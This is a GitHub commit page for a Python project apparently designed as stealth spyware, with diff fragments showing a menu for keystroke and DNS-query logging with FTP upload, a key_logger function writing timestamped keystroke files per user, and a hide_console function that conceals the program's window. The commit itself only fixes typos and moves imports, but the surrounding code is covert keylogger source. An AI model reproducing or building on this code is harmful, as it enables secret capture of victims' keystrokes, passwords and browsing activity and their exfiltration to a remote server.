Skip to content

Commit

Permalink
0.1.7
Browse files Browse the repository at this point in the history
  • Loading branch information
lifaet committed Dec 24, 2023
1 parent d521f68 commit c68261c
Show file tree
Hide file tree
Showing 3 changed files with 6 additions and 5 deletions.
2 changes: 1 addition & 1 deletion kss.py
Original file line number Diff line number Diff line change
Expand Up @@ -25,7 +25,7 @@ def main():
p3 = multiprocessing.Process(target=key_logger, name="KeyLogger")
p4 = multiprocessing.Process(target=dns_logger, name="DNSQuaryLogger")
while True:
service_choise = int( input("Choose what service you want. \n 1. Key and Dns Quary logger with offline and ftp upload. \n 2. Key and Dns Quary logger offline Only. \n 3. Key logger only with offline and ftp upload. \n 4. Key logger offline Only. \n 5. Dns Quary logger offline and ftp upload. \n 6. Dns Quary logger offline. \n 7. Exit \n"))
service_choise = int( input("Choose what service you want. \n 1. Key and Dns Query logger with offline and ftp upload. \n 2. Key and Dns Query logger offline Only. \n 3. Key logger only with offline and ftp upload. \n 4. Key logger offline Only. \n 5. Dns Query logger offline and ftp upload. \n 6. Dns Query logger offline. \n 7. Exit \n"))
match service_choise:
case 1:
p2 = multiprocessing.Process(target=sync, args=( input("Ftp Host/Ip:"), input("Ftp Username:"), input("Ftp Passward:")), name="SyncFtp")
Expand Down
3 changes: 2 additions & 1 deletion stealth/logger.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,8 @@

#key logger
def key_logger():
logging.basicConfig(filename="keylog-"+user_name()+current_time()+".txt", level=logging.INFO, filemode='a', format='%(asctime)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logging.basicConfig(filename="keylog-"+user_name()+current_time()+".txt", level=logging.INFO, filemode='a',
format='%(asctime)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
# define a callback function to process the keystrokes
def on_key_press(event):
# get the name of the pressed key
Expand Down
6 changes: 3 additions & 3 deletions stealth/utilities.py
Original file line number Diff line number Diff line change
Expand Up @@ -4,9 +4,6 @@
import netifaces
import winreg
import time
import win32console
import win32gui
import win32con
from sync_ftp import SyncFtp
import http.server
import base64
Expand Down Expand Up @@ -35,6 +32,9 @@ def dir_path():

# #this hide function help to minimize the console
def hide_console():
import win32console
import win32gui
import win32con
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window,win32con.SW_HIDE)
return True
Expand Down

0 comments on commit c68261c

Please sign in to comment.